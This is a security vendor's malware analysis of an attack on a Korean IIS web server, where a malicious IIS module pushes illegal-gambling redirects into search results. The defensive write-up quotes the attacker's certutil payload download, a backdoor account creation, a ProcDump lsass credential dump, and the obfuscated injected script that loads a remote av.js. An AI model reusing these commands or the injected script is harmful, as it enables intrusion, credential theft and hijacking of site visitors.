AhnLab SEcurity intelligence Center (ASEC) has discovered evidence of a malware strain being distributed to web servers in South Korea, leading users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware tool. They then used ProcDump to exfiltrate account credentials from the server. IIS modules support expansion features of web servers such as authentication, HTTP responses, and logging. Modules can be developed using ISS C++ API or ASP.NET 2.0 API.
The IIS module malware discovered in this case monitors for a string in the HTTP header in the web server where the module is installed and sends a modified response value when certain conditions are met to expose ads for an illegal gambling website on Korean and Chinese portal websites. When users click the link, they are redirected to the illegal gambling website.
1. Meterpreter Backdoor
Before installing the Meterpreter backdoor in the web server, the threat actor executed various normal utilities such as ipconfig and systeminfo. The attacker’s behavior is likely done to collect information on the attack target before installing the IIS module malware. Table 1 below shows a timeline of the commands used by the threat actor.
| Command Execution Time | Executed CMD Command |
| Apr. 9, 2024 03:43:12 | ipconfig |
| Apr. 9, 2024 03:45:32 | systeminfo |
| Apr. 9, 2024 03:45:49 | whoami |
| Apr. 9, 2024 03:56:20 | powershell whoami |
| Apr. 9, 2024 04:17:13 | hostname |
| Apr. 9, 2024 04:17:21 | net1 user |
| Apr. 9, 2024 04:17:42 | query user |
| Apr. 9, 2024 04:22:10 | ping 45.154.12.215 |
| Apr. 9, 2024 04:23:18 | curl |
| Apr. 9, 2024 04:23:56 | certutil |
| Apr. 9, 2024 04:28:20 | certutil -urlcache -split -f hxxp://m****k*****l[.]com/msf.txt |
| Apr. 9, 2024 04:32:20 | %ALLUSERSPROFILE%xx.txt |
The Meterpreter backdoor is executed after being given the threat actor’s IP and port number. Based on the analysis of the backdoor code, it is likely that the code communicated with the threat actor’s server to receive and execute a shellcode.
2. HTran (Port Forwarding Tool)
After installing the Meterpreter backdoor, the threat actor additionally installed the HTran utility through the w3wp.exe process. HTran is a port forwarding tool whose source code is published on GitHub. Port forwarding is a feature where data transmitted to a certain port is forwarded to another port. While it can be used in various ways depending on the threat actor, in most cases, HTran enables remote communication with the RDP port.
After installing the Meterpreter backdoor and HTran port forwarding tool, the threat actor created an attacker account to maintain persistence in the target system and establish a foothold. By creating the account, the threat actor can easily access the web server from outside without needing account credentials for that server.
| Command Execution Time | Executed CMD Command (Add Account) |
| Apr. 9, 2024 05:04:51 | net user kr$ test123!@# /add |
It took less than 2 hours for the threat actor to compromise the server, from initial access to the target to establishing a foothold and maintaining persistence. After maintaining persistence, the threat actor created the IIS module malware.
3. IIS Module Malware
Ordinarily, IIS modules exist in the DLL format in the path C:WindowsSystem32inetsrv and are loaded onto w3wp.exe (an IIS worker process) to be run. In order to be executed after being loaded onto w3wp.exe, IIS C++ API must be used and the Export function must contain RegisterModule. When the modules are run, the information on the HTTP header requested to the IIS web server is transmitted to the event handler in RegisterModule. Each handler can process the requests for HTTP headers. Out of many handler values, the identified malware strain injected the malware into the OnSendResponse handler so that whenever a SendResponse event takes place in the IIS web server, the malicious handler (sub_7FFB3DB7E840) is executed instead.
OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.
The installed malware strain manipulates the response value for the HTTP header information requested to the web server. It checks the User-Agent, Referer, and other values of the incoming HTTP header to check the inflow path of the web page. If it contains strings related to certain search portal websites, the malware returns a link to an illegal gambling-related page instead of a normal web page.
Searching for information on a compromised Korean website on the portal website shows illegal online gambling-related pages (see Figure 7).
In order for a website to be exposed on the search portal website, the web server must be exposed to the search engine. In the process of the search engine approaching the webpage and collecting information, the search engine’s HTTP header information is transmitted to the web server. When the header value matches certain keywords, the malware determines it to be a search engine requesting access. Then, it transmits to the search engine the meta tag information including the title, keyword, and description of an illegal online gambling website.
Through such process, users are shown with illegal online gambling sites despite searching for normal sites on the portal website. The following information shows the search engines that the malware checks and an explanation of other key features.
[1] Sends a script response that redirects to “hxxps://ll.olacityviet.com/av.js” when matches to certain keywords are found
Checks for the inclusion of the following keywords in the User-Agent header
– naver|sogou|360|yisou|daum|google|coccoc
Checks for the inclusion of the following keywords in the Referer header
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc
[2] Steals cookie information from the HTTP header
The obfuscated script code below is the response value to the HTTP approach, which is the code that the malware injects into the normal response value. Due to this code, users are redirected to the illegal online gambling website URL.
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return 'w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('b' + e(c) + 'b', 'g'), k[c]);
return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!''.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f'\w+'};c=1};j(c--)h(k[c])p=p.i(q s('\b'+e(c)+'\b','g'),k[c]);f p}('1["2"]["3"]('<0 4="5/6" 7="8://9.a/b.c"></0>');',l,l,'t|u|v|x|y|z|A|B|C|D|E|F|G'.H('|'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>The following is the decryption code.
document.write('<script src="hxxps://ll.olacityviet.com/av[.]js"></script>');Particular caution is advised because although the malware currently redirects users to an illegal online gambling website, it can perform other malicious behaviors depending on the response script.
4. Circumstance of Exploiting ProcDump
After installing the IIS module malware, the threat actor used ProcDump to dump the process memory of the current web server’s lsass.exe. This is an act of stealing account credentials in a way similar to Mimikatz and was probably used for lateral movement to another server connected to the web server.
| Command Execution Time | Executed CMD Command |
| Apr. 10, 2024 00:20:44 | %ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip |
5. Conclusion
The threat actor attempted to initially infiltrate a poorly managed Windows web server and went through the following processes: establishing a foothold, maintaining persistence, achieving their goals, and obtaining account credentials for lateral movement. Currently, search engines such as Shodan and FOFA can be used to find information on the IP address, port, services in use, and OS information of devices connected to the Internet around the world. It is deemed that the threat actor would also use these search engines to search for attack targets. Thus security managers of enterprises must identify assets that may be exposed to threat actors through attack surface management and manage them, such as applying the latest security patches.
File Detection
Meterpreter Backdoor
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)
IIS module malware (x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)
IIS module malware (x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)
IoCs
MD5s
Meterpreter Backdoor
– d5312ab7f01fd74d399c392effdfe437
IIS module malware (x64)
– ebeb931a6dd91a227225f0ff92142f2b
IIS module malware (x86)
– 28dd72e322f6be382dac4fa9eb5cd09b
C&C URLs
C&C address of the Meterpreter backdoor
– 43.156.50[.]76
Illegal online gambling link-related URLs
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps://ll.olacityviet[.]com/av.js
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Case of Malware Distribution Linking to Illegal Gambling Website Targeting Korean Web Server appeared first on ASEC BLOG.